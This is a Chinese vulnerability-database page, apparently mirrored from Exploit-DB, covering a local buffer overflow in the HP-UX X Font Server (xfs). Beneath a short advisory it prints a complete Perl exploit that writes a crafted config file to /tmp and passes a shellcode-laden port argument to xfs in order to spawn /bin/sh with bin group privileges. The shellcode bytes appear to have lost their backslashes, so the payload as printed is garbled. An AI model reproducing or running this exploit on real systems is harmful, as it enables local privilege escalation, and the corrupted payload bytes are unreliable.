HP-UX 7-11 – X Font Server Local Buffer Overflow

HP-UX 7-11 – X Font Server Local Buffer Overflow

漏洞ID 1053747 漏洞类型
发布时间 2003-03-10 更新时间 2003-03-10
图片[1]-HP-UX 7-11 – X Font Server Local Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-HP-UX 7-11 – X Font Server Local Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 HP-UX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24210
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10551/info

HP-UX X Font Server is reportedly affected by a local buffer overflow vulnerability. This issue is due to a failure of the application to properly validate the length of a user-supplied string before copying it into a finite buffer.

This issue may result in corruption of the affected application's memory space. This may be exploited to manipulate the execution flow of the vulnerable application, allowing for the execution of arbitrary machine code with the privileges of the 'bin' group.

#!/usr/contrib/bin/perl
#   Name  : x_hpux_xfs.pl
#   Exploit xfs command of HPUX to get bin gid shell.
# * Usage : perl ./x_hpux_xfs.pl
#   Discovered By watercloud 2003-03-10
#   http://www.xfocus.org (English)
#   http://www.xfocus.net (????)
#   Tested: HPUX B11.0
$BUFF="A";
$BUFF.="x0bx39x02x99"x58;
$BUFF.="x41x41x41x41x7fx7fx01x16x7fx7fx01x1cx0bx39x02x99";
$BUFF.="x0bx39x02x57x2axe4x97x10x28x3bx70xefx08x37x02x43";
$BUFF.="xb6xfax40x04xb6xf9x40x04xb6xf8x40x04xe4x60xe0x08";
$BUFF.="xb6xf6x40xfex0bx39x02x99x2bx24x97x10x28x3bx70xef";
$BUFF.="xebx5fx1fxfdx0bx39x02x99xb7x5ax40x22x0fx40x12x0e";
$BUFF.="x08x39x02x43xe4x60xe0x08xb4x16x70x16/bin/shA";
open(OUTFILE, ">/tmp/.c");
print OUTFILE "error-file=";
print OUTFILE "x7fx7fx01x10"x500;
close(OUTFILE);
exec("/usr/bin/X11/xfs -config /tmp/.c -port '$BUFF'");
#EOF

相关推荐: Microsoft Windows File Protection Code-Signing Verification Weakness

Microsoft Windows File Protection Code-Signing Verification Weakness 漏洞ID 1101105 漏洞类型 Design Error 发布时间 2002-12-26 更新时间 2002-12-2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享